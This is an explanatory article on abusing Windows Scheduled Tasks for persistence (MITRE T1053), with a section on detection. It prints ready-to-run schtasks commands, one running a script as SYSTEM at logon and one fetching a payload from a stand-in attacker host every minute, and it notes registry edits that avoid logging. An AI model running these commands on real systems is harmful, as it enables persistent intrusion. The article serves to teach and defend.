Maintaining access to a compromised system is a critical objective for threat actors and red teams. One of the most effective methods for achieving this persistence on Windows systems is through the use of Scheduled Tasks. This article will delve into how this technique is utilised by attackers, the potential implications for compromised systems, and its alignment with the MITRE ATT&CK framework, specifically focusing on technique T1053.
What Are Windows Scheduled Tasks?
Windows Scheduled Tasks is a powerful built-in feature that allows users and administrators to automate the execution of programs or scripts at specified times or under certain conditions. While this functionality is essential for legitimate administrative tasks such as system maintenance, software updates, and backups, it has been heavily abused by attackers to maintain persistence on compromised systems.
Persistence refers to the ability of an attacker to maintain their access to a system, even after restarts or logoffs. Scheduled tasks are a particularly effective means of persistence because they can be configured to execute with elevated privileges, at critical moments such as system startup or user logon.
How Scheduled Tasks Work
The schtasks.exe utility is the primary tool used to create and manage scheduled tasks from the command line. This utility offers a variety of scheduling options, giving attackers the flexibility to run malicious code at startup, on logon, or at regular intervals, depending on their needs.
Here's an example of a command used to create a scheduled task that runs a PowerShell script every time a user logs in:
schtasks /create /tn "MaliciousTask" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\path\to\malicious-script.ps1" /sc onlogon /ru SYSTEM/tn "MaliciousTask" specifies the name of the task.
/tr "powershell.exe -ExecutionPolicy Bypass -File C:\path\to\malicious-script.ps1" defines the command that will be executed, in this case, a PowerShell script that bypasses the default execution policy.
/sc onlogon schedules the task to run every time a user logs in, ensuring the persistence mechanism is triggered as soon as a user session starts.
/ru SYSTEM runs the task with SYSTEM privileges, giving it elevated access to the system. This ensures the task operates with the highest level of access, making it harder to remove and more dangerous in its capabilities.
In practice, this means an attacker could set up a task to run every time a user logs on, or even on a system reboot, without needing any further interaction. This type of persistence ensures that even if other parts of the attack are discovered and cleaned up, the task remains, silently executing malicious code.
The Red Team Perspective
From a red team perspective, leveraging scheduled tasks for persistence is a tried-and-true tactic. It is a method that blends into the typical behaviour of Windows environments, making it less likely to raise alarms. System administrators often use scheduled tasks for routine operations, so adding a malicious task can go unnoticed.
In a real-world red team engagement, an operator might create a persistent task designed to download and execute a malicious payload. A practical example could involve setting up a task to run every minute, ensuring that a payload is repeatedly downloaded and executed:
schtasks /create /tn "DownloadPayload" /tr "powershell.exe -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri http://attacker.com/payload.exe -OutFile C:\temp\payload.exe" /sc minute /mo 1 /ru SYSTEM
This task ensures that even if the payload is removed or blocked by antivirus software, it will be downloaded again every minute, guaranteeing a steady stream of attacks. Once the task successfully runs, the attacker can establish a remote session to a Command-and-Control (C2) server, allowing them to maintain control over the compromised system.
Evasion Techniques
While creating a scheduled task is relatively simple, more advanced attackers or red teams may employ evasion techniques to ensure that their activities go unnoticed. One such technique involves directly modifying the Windows Registry to create or alter scheduled tasks. By doing this, attackers can bypass the standard event logs associated with task creation, which would otherwise alert security teams.
For example, attackers might write their task directly into the TaskCache registry keys under:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Schedule\TaskCache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Schedule\Tasks This allows them to establish persistence without generating the usual Windows Event Logs, making it much harder for defenders to detect the task’s existence.
Additionally, attackers may schedule tasks to run at irregular or random intervals to further evade detection. By avoiding predictable schedules, such as running every minute or hour, they reduce the likelihood that automated detection systems will flag the task as suspicious.
Defending Against Scheduled Task Abuse
To defend against the misuse of scheduled tasks, defenders should regularly audit the Task Scheduler and monitor event logs for signs of abnormal task creation. Task Scheduler logs are stored in the Event Viewer under Applications and Services Logs > Microsoft > Windows > TaskScheduler. By keeping an eye on these logs, defenders can catch unusual task creation events or suspicious commands tied to PowerShell or other administrative tools.
Security teams should also focus on detecting execution policy bypasses in PowerShell scripts, as these are commonly used by attackers to execute malicious code. Logging tools such as Windows PowerShell Logging and Sysmon can be helpful in detecting these activities. Sysmon can log the creation of new processes, which includes scheduled tasks triggering malicious scripts.
MITRE ATT&CK Framework Alignment
This tactic of using scheduled tasks for persistence aligns with the MITRE ATT&CK framework under T1053: Scheduled Task/Job. The technique is categorised under Persistence, as it allows an attacker to maintain access to a system. It also falls under Privilege Escalation, as scheduled tasks can be configured to run with SYSTEM or other elevated privileges.
The MITRE ATT&CK framework is a widely adopted model for understanding the tactics, techniques, and procedures (TTPs) used by attackers. By aligning red team tactics with the MITRE ATT&CK framework, both attackers and defenders can gain a deeper understanding of how to implement or defend against certain techniques.
Conclusion
Scheduled tasks are a versatile and widely used persistence mechanism in Windows environments. For red teams and attackers, they provide a reliable method to maintain access and execute malicious code under the radar. For defenders, understanding the ways in which scheduled tasks can be abused is critical to developing effective detection and prevention strategies.
Regular auditing, robust logging, and a comprehensive understanding of the MITRE ATT&CK framework are key to ensuring that these tactics are detected and mitigated before they cause significant damage.
By optimising security practices and focusing on proactive detection, organisations can better protect against this common persistence mechanism in their Windows environments.
Comments